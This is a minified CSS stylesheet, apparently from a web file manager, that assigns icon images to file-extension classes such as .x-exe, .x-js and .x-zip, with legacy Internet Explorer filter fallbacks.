.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none 